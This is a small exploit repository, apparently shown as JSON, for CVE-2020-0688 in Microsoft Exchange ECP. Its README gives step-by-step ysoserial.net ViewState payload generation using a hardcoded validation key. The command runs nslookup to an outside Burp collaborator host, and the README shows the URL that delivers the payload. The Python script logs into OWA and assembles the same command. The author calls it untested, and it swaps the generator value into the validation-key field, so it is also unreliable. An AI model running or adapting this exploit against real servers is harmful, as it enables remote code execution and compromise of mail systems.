[
  {
    "path": "README.md",
    "content": "# cve-2020-0688\ncve-2020-0688\n\nLogin with a user with an email address privliage is nothing to worry about.\n\nGrab -  `__VIEWSTATEGENERATOR` from page source\nGrab - the value of `ASP.NET_SessionId` cookie for viewstateuserkey value\n\n[Download YSO Here](https://github.com/pwntester/ysoserial.net/releases/download/v1.32/ysoserial-1.32.zip)\n\n\n```\nysoserial.exe -p ViewState -g TextFormattingRunProperties -c \"nslookup teasdas.myburpcollab.net\" --validationalg=\"SHA1\" --validationkey=\"CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF\" --generator=\"B97B4E27\" --viewstateuserkey=\"05ae4b41-51e1-4c3a-9241-6b87b169d663\" --isdebug –islegacy\n```\n\nGET TO:\n\n```\nhttps://localhost/ecp/default.aspx?__VIEWSTATEGENERATOR=<generator>&__VIEWSTATE=<ViewState>\n```\n\nThe Exploit.py is untested and need a demo system to fire up and play with.\n"
  },
  {
    "path": "exploit.py",
    "content": "#\n# THIS WILL NOT WORK IT NEEDS WORK\n#\n#\n# This is a mock up of a exploit flow i need a system i can test on this to make it work but here is the base code to get some where\n#\n# By Random_Robbie \n#\n#\nimport requests\nimport argparse\nimport re\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-s\", \"--server\", required=True, help=\"ECP Server\")\nparser.add_argument(\"-u\", \"--user\", required=True, help=\"Email Address\")\nparser.add_argument(\"-p\", \"--password\", required=True, help=\"Password\")\n\nargs = parser.parse_args()\n\n\nowa_login_form_url = args.server\n\nuser_name = args.user\npwd = args.password\n\n\n\n\nsession = requests.Session()\n\nparamsPost = {\"password\":\"\"+pwd+\"\",\"isUtf8\":\"1\",\"passwordText\":\"\",\"trusted\":\"4\",\"destination\":\"\"+owa_login_form_url+\"\",\"flags\":\"4\",\"forcedownlevel\":\"0\",\"username\":\"\"+user_name+\"\"}\nheaders = {\"Accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\",\"Upgrade-Insecure-Requests\":\"1\",\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0\",\"Connection\":\"close\",\"Accept-Language\":\"en-US,en;q=0.5\",\"Accept-Encoding\":\"gzip, deflate\",\"Content-Type\":\"application/x-www-form-urlencoded\"}\ncookies = {\"PBack\":\"0\",\"PrivateComputer\":\"true\"}\nresponse = session.post(\"\"+owa_login_form_url+\"auth.owa\", data=paramsPost, headers=headers, cookies=cookies)\n\nprint(\"Status code:   %i\" % response.status_code)\nif \"reason=2\" in response.text:\n\tprint (\"Login Incorrect\")\nelse:\n\tVIEWSTATEGENERATOR = re.compile('id=\"__VIEWSTATEGENERATOR\" value=\"(.+?)\"').findall(str(response.text))[0]\n\tviewstateuserkey = re.compile('ASP.NET_SessionId=(.+?) Time').findall(str(response.headers))[0]\n\tprint(\"\"\"ysoserial.exe -p ViewState -g TextFormattingRunProperties -c \"nslookup teasdas.myburpcollab.net\" --validationalg=\"SHA1\" --validationkey=\"\"\"+VIEWSTATEGENERATOR+\"\"\" --generator=\"B97B4E27\" --viewstateuserkey=\"\"\"+viewstateuserkey+\"\"\" --isdebug –islegacy\"\"\")\n\n\n"
  }
]